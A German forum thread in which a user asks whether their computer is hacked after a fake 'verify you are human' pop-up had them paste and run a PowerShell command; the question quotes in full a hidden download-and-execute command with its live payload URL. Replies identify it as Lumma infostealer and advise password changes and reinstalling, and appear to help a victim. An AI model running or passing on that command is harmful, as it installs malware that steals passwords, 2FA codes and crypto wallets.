Hilfe leutes Computer gehackt?

Moim leutes, ich hab voll den angst gerade, ich hab ausversehen bei einem Pop Up, geklickt, da stand um mich als mensch zu verifizieren muss ist WIN + R, STRG V eingeben, ich musste folgendes ausführen: powershell.exe -W Hidden -command $url = 'https://studla.b-cdn.net/mine/carted/delta/bhindar.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

das musste ich ausführen und hab es dann auch gemacht, was macht dieser befehl und sollte ich angst haben? voll den angst gehabt gerade

3 Antworten

Micreen

Nutzer, der sehr aktiv auf gutefrage ist

im Thema Virus

02.11.2024, 14:44

Moin,

ich kann zwar aktuell keine Analyse durchführen, aber häufig sind diese exakte Masche Infostealer. Jedenfalls als ich diesen Scam das letzte Mal untersucht habe.

Das hier kann dennoch eine Infektion mit Schadsoftware bewirkt haben, also bitte installiere dein Betriebssystem neu!

Weil es höchstwahrscheinlich ein Infostealer war, solltest du dringend deine Passwörter von einem anderen Gerät ändern. Bitte möglichst schnell!

Wenn du möchtest, kann ich später eine Analyse von diesem Exemplar durchführen.

Cheers

Woher ich das weiß:Hobby – Ich analysiere Schadsoftware (Malware)

kenomemo

Beitragsersteller

02.11.2024, 15:44

Bitte versuch das mal

Micreen

02.11.2024, 18:13

@kenomemo

Da bin ich wieder. Ich habe mir das Skript genauer angesehen. Es lädt dir eine .zip Datei herunter, entpackt diese und führt die schädliche Datei "EditLoc.exe" aus. Diese ist ein Luma Stealer, wie ich erwartet habe. Der klaut dir so ziemlich alles vom System, von Passwörtern und 2FA-Codes über Crypto-Wallets bis hin zur Zwischenablage. Ich hoffe, du hast deine Passwörter schon geändert!

Ich empfehle immer noch, dein System neu zu installieren, auch, wenn Lumma normalerweise nicht bleibt, sondern nur einmal ausgeführt wird. Sicher ist sicher.

-- Nachtrag: Aufgrund deiner zweiten Frage, die du gepostet hast, schätze ich, dass dieses Exemplar auf deinem System BLEIBT. Also zurücksetzen!!!

Genervter0815

02.11.2024, 08:29

Du bist schon, sorry wenn ich das schreibe, ziemlich dämlich.

Den Link klicke ich sicher nicht an. SIeht aber so aus, als missbraucht dich nun jemand zum Bitcoin Minen.

Woher ich das weiß:Studium / Ausbildung – Ausbildung zum Fachinformatiker für Systemintegration.

kenomemo

Beitragsersteller

02.11.2024, 15:52

Das war ein Pop-up, ich bin bisschen älter und wusste es nicht, mein sohn hat mir das dann erklärt.

Genervter0815

02.11.2024, 20:33

@kenomemo

Niemals einfach etwas ausführen, wenn du keine Ahnung hats, was es macht.

Setze deinen Computer auf eine frühere Version zurück. Das kannst du im Internet nachlesen, wie das geht.

R4c1ngCube

02.11.2024, 08:47

Ja, das ist definitiv Malware. Beim nächsten mal vorher fragen.

Windows defender hat also nicht reagiert? Laut VirusTotal erkennt er diesen Trojaner eigentlich, aber vielleicht nicht, wenn man es über Powershell runterlädt und ausführt.

Evtl zB mal Malwarebytes ausprobieren.

Oder Windows defender mal einen Komplett Check ausführen lassen.

Ansonsten kann man das mit etwas Glück auch manuell wieder entfernen.

kenomemo

Beitragsersteller

02.11.2024, 15:45

Hab Windows defender mal nen checker gemacht und malwarebytes auch da kam nix raus

Ähnliche Beiträge

Powershell invoke webrequest Login daten übernehmen?

Guten Abend zusammen,

Ich möchte mich aus dem Steamstore Preise mit Powershell abfragen.

$w = Invoke-WebRequest "https://steamcommunity.com/market/listings/730/AWP%20%7C%20Mortis%20%28Field-Tested%29"
[array]$price = $w.AllElements | where class -eq "market_listing_price_listings_block" | select outerText

Mit diesem Script bekomme ich die Preise auf der rechten Seite.

Output Powershell:

Das Problem ist jedoch, dass die Preise in unterschiedlichen Währungen angezeigt werden. Wenn ich mich mit einem Steam Account anmelde, währen die Preise einheitlich.

Mit diesem Script kann ich mich anmelden auf Steam:

$R = Invoke-WebRequest https://steamcommunity.com/login -SessionVariable fb
$Form = $R.Forms[0]
$Form.fields


$Form.Fields["input_username"]="XYYYY"
$Form.Fields["input_password"]="XYYYY"
$Uri = "https://steamcommunity.com/login" + $Form.Action
$R = Invoke-WebRequest -Uri $Uri -WebSession $FB -Method POST -Body $Form.Fields

$R.StatusDescription
$FB.UseDefaultCredentials = $true

Jetzt müsste ich mit diesen Anmeldedaten auch die Webrequest vom Beginn meiner Frage durchführen.

Ich frage mich, wie ich das genau machen kann.

Danke für die Hilfe

...zum Beitrag

wie kann ich eine Website mithilfe von Powershell auslesen?

Hallo,

ich will von der Website https://steamcommunity.com/market/listings/730/Operation%20Breakout%20Weapon%20Case

folgende Daten mit Powershell auslesen und nachher in ein Excel File übertragen:

(Gelb markiert)

Wenn ich dieses Element untersuche wird mir dieser Code angezeigt. In dem Code kann man genau die Daten 55425 und 0.92 auslesen.

Jetzt habe ich in Powershell diesen Code genutzt:

$url = Invoke-WebRequest -Uri "https://steamcommunity.com/market/listings/730/Operation%20Breakout%20Weapon%20Case"

$url | Get-Member
$url.AllElements | where class -EQ "market_commodity_order_summary"

Dabei kam kam das raus:

Die Class market_commodity_order_summary hat es gefunden, jedoch benötige ich den ganzen Inhalt dieser Class damit ich die Anzahl dieses Items und den Preis des Items auslesen kann.

Was muss ich machen, damit ich die gelb markierten Informationen auslesen kann?

Oder ist es nicht möglich, da sich dieser Wert immer wieder verändert?

Danke für eure Hilfe :D

...zum Beitrag

Wurde ich gehackt?

Ich musste eben auf eine Hostel Website und da hab ich die Benachrichtigung auf dem Bild bekommen. Was soll ich jetzt tun? Ich hab mein Handy ganz ausgeschaltet.
Wurde ich wirklich gehackt?

...zum Beitrag

Wie bringt man Hacker zur Verzweiflung?

...zum Beitrag

Trojaner zurückverfolgen?

Ich habe gestern auf meinem Rechner einen Trojaner entdeckt und diesen natürlich sofort entfernt. Meine Frage ist ob ich irgendwie zurückverfolgen kann woher dieser gekommen ist?

Der letzte download den ich auf diesem Rechner getätigt habe war vor knapp einem Jahr. Der Rechner wurde ein halbes Jahr nicht benutzt wurde aber zwischendurch geupdated. Vor 2 Wochen wurde der Rechner wieder regelmäßig genutzt und gestern früh plötzlich Warnung von Microsoft, dass er einen Trojaner hat. (Es wurde der Browser auch seit einem halben Jahr nicht mehr geöffnet).

Die Datei hieß

TrojanProxy:Win32/Acapaladat.B

und

TrojanProxy:Win32/Acapaladat.A

dazu habe ich im Task Manager den Microsoft phone link entdeckt den ich allerdings noch nie benutzt hatte und auch nicht wusste das es diesen gibt.

Würde mich über jegliche Hilfe freuen

...zum Beitrag

Was genau ist ein Phising Link?

Ist ein Phising Link immer mit einer Malware verbunden? Oder ist Phising das anlocken an einer Scammer Seite wo man dann seine Daten angibt?

Und wenn es Unterschiede gibt, mit welchen Softwares kann man die erkennen?

...zum Beitrag

Trojaner=.ddl?

Hallo, ich habe einen Trojaner und Keylogger und eventuell noch mehr Viren auf meinen PC und habe in meinen Systemdateien .ddl dateinen gefunden bei dennen ich die Vermutung habe, dass diese die Viren sind. Eine davon hat einen sehr auffäligen Namen "passwordenrollmentmanager". Jetzt ist meine Frage kann ich .ddl Dateien bedenkenlos aus meinem System löschen? Ich bin mir sicher, dass ich einen Trojaner und Keylogger habe, und ich kann sie nicht mit meinem Antivirusprogramm oder einem PC Reset löschen.

...zum Beitrag

Ist das eine Phishing-Nachricht?

...zum Beitrag

Glaubt ihr das ihr sichere Passwörter habt oder könnten Hacker eure Passwörter leicht knacken?

...zum Beitrag

Ist ein skinchanger ein virus?

Ist zum Beispiel galaxy swapper ein Virus?

...zum Beitrag

War das ein hackerangriff?

Also ganz komisch ich habe keine Email bekommen das diese Konto auf meine Email geändert wurde. Denkt ihr das war ein hacker?

...zum Beitrag

Was machen ( Virus)?